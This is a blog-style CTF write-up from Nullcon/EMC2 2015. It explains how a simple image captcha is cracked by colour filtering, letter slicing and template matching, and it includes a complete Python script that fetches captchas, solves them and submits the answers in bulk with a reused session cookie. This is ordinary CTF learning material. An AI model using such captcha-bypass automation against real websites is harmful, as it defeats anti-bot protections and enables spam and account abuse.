Cracking a Captcha . Nullcon| EMC2 CTF 2015
by
, 01-15-2015 at 05:01 PM (0 Views)
Last week EMC2/nullcon CTF got over . Even though I really wanted to I did not have enough time to play the ctf. I was/am busy working on my "hacking Drones" research for Nullcon .
http://nullcon.net/website/goa-15/sp...rahul-sasi.php
Last year I was one among the top 30 finilist of EMC2 defenders league and stood 5th in the final ranking.
https://www.facebook.com/photo.php?f...type=1&theater
https://twitter.com/varunsharma14/st...65888308039680
Any way on Sunday night I got bit bored with drones and decided to take a sneak peak at the CTF, but by that time the winners were declared and score board was closed. I went straight to my favorite web and reversing challenges and decide to solve one of those. Web 5 was a captcha sovler for 500 point ands I decided that would be easy.
The challenge was to break maximum number of captcha and submit using a given session token in a time frame of 2 minutes.
Analyzing the captcha we easily understand that , there are 5 easily visible colours.
Black == background
dark violet == dots
Gray == lines
Letters == In some form of light violet colors.
Form the look of it, it was an easily crack-able captcha .
This is small AI problem where we need to create a program that could recognize these captchas. We need to teach our AI program what is right and what is
wrong. So the first step is to build a training data set, that goes as an input for our captcha solver . For creating the training data people choose
different methods, they depend on neural networks, Vector Space Search etc. In our current situation we do not have a complicated data set. The captcha is simple and has only [a-z,A-Z ] characters in it.
Building the Training Data set.
Step 1 :
The captcha image we are provided was a PNG file, which is in RGBA mode [Red Green Blue Alpha] . ref: en.wikipedia.org/wiki/RGBA_color_space. We will have to bring it down to a maxium of 255 colour space. And the best way to do that is to
convert the image to gif form png. We will use python PHL module to do that.
"
captcha_image = captcha_image.convert("P")
"
Next step is the find the image pixel concentration . Plot the colour and the respective pixel count.
We can use phil histogram and plot . And we get the following.
[-] Image pixel concentration
0 8344
190 938
53 301
96 184
204 113
205 69
60 24
210 14
211 7
95 4
Here 0 stands for Black and has the most pixel count 8344 followed by color 190. At this point I assumed color 204 and 205 are those that that are used for captcha letters.
Step 2:
Remove the noises from the image. This is easy to do as we can simply remove those pixels that are not used for captcha letters.
Simply plot those captcha letter colors to a new image and remove everything else.
if pix == 204 or pix == 205: # these are the numbers to get
captcha_filtered.putpixel((y,x),0)
Now we would get an image whose background is white with all noises removed.
Step 3:
Next step is to find the captcha letter spacing, and slice each characters out of the captcha .
This would be easy as we have only three different colours in our new image. 255,204,205 .
Horizontal position where letter start and stop .
|a|s|d|f|e
image 1 Line Spacing is [(5, 13), (35, 43), (65, 73), (95, 102), (125, 133), (155, 163)]
Image 2 Line Spacing is [(5, 13), (35, 43), (66, 73), (96, 102), (125, 133), (155, 163)]
Each letters in the captcha occupied almost the same space .
Cut each characters and place them inside a folder.
Rename each letter images[file name] to there respective letter .
Now we will have a folder with sliced letter named with there respective letter.
Final Solution algorithm:
The final algorithm to solve the captcha would be.
a) read a new captcha , session cookie
b) filter noise out
c) Slice filtered captcha and extract each letter
d) compare it with those letters kept in the letter folder and find the best match,
c) best match would be the captcha letter
d) continue for all letters in captcha
e) Submit the full captcha along with session cookie to application
f) fetch new captcha with session cookie, goto step b
Compare two images in Python:
There are multiple ways to compare an image in python .
1) Calculate the root mean square
ref: http://code.activestate.com/recipes/...ng-two-images/
2) Euclidean distance
3) Normalized cross-correlation
We will choose the normalized cross relation.
PHIL module's difference returns the absolute value of the difference between the two images.
ImageChops.difference(image1, image2) ⇒ image
out = abs(image1 - image2)
Our images are in the same shape and size. So this is the best bet.
My program had 97% success rate and after 50 successful entries I got the flag.PHP Code:
from PIL import Image,ImageChops
from operator import itemgetter
import urllib2,hashlib,time,urllib
import cStringIO,glob
#we have kept all our letters in this folder
files_names = glob.glob("/root/ctf/let/*.*")
#we need to get the captcha at the same time get the session cookie, and use it for all solved captcha request.
response = urllib2.urlopen('http://54.165.191.231/imagedemo.php')
cookie = response.headers['Set-Cookie']
#print cookie
#lets make 500 request read teach captcha
for x in range(1,500):
captcha =""
opener = urllib2.build_opener()
opener.addheaders =[
('Accept', 'application/json, text/javascript, */*; q=0.01'),
('Referer', 'http://www.garag4hackers.com'),
('Cookie' ,cookie),]
response = opener.open('http://54.165.191.231/imagedemo.php')
length = response.headers['content-length']
# read the captch and we will save them with there content length */
print "[-] Image Content length " , length
image_read = response.read()
#cStringIO to create an object from memmory
#image_read = Image.open("/root/ctf/u.png")
image_read = cStringIO.StringIO(image_read)
captcha_image = Image.open(image_read)
#im = Image.open("/root/ctf/de")
captcha_image = captcha_image.convert("P")
temp = {}
captcha_filtered = Image.new("P",captcha_image.size,255)
#print im.histogram()
his = captcha_image.histogram()
values = {}
for i in range(256):
values[i] = his[i]
print "[-] Image pixel concentration \n"
for color,concentrate in sorted(values.items(), key=itemgetter(1), reverse=True)[:10]:
print color,concentrate
for x in range(captcha_image.size[1]):
for y in range(captcha_image.size[0]):
pix = captcha_image.getpixel((y,x))
temp[pix] = pix
if pix == 204 or pix == 205: # these are the numbers to get
captcha_filtered.putpixel((y,x),0)
captcha_filtered.save("/root/ctf/images/"+length+".gif")
inletter = False
foundletter=False
start = 0
end = 0
letters = []
for y in range(captcha_filtered.size[0]): # slice across
for x in range(captcha_filtered.size[1]): # slice down
pix = captcha_filtered.getpixel((y,x))
if pix != 255:
inletter = True
if foundletter == False and inletter == True:
foundletter = True
start = y
if foundletter == True and inletter == False:
foundletter = False
end = y
letters.append((start,end))
inletter=False
print "[-] Horizontal Position Where letter start and stop \n"
print letters
print "\n"
count = 0
for letter in letters:
m = hashlib.md5()
im3 = captcha_filtered.crop(( letter[0] , 0, letter[1],captcha_filtered.size[1] ))
#Match current letter with sample data
#im3.save("/root/ctf/let/%s.gif"%(m.hexdigest()),quality=95)
count += 1
base = im3.convert('L')
#print files_names
class Fit:
letter = None
difference = 0
best = Fit()
for letter in files_names:
#print letter
current = Fit()
current.letter = letter
sample_path = letter
#print sample_path
sample = Image.open(sample_path).convert('L').resize(base.size)
difference = ImageChops.difference(base, sample)
for x in range(difference.size[0]):
for y in range(difference.size[1]):
current.difference += difference.getpixel((x, y))
if not best.letter or best.difference > current.difference:
best = current
#final captcha decoded
tmp = best.letter[14:15]
captcha = captcha+tmp
#let us post the captcha to the server along with the session token
print "[+] Captcha is ", captcha
url = 'http://54.165.191.231/verify.php'
data = urllib.urlencode({'solution' : captcha.strip(), 'Submit' : 'Submit'})
req = opener.open(url, data)
response = req.read()
print response
GitHub Code: https://github.com/fb1h2s/captcha-cracker
Ref:http://www.boyter.org/decoding-captchas/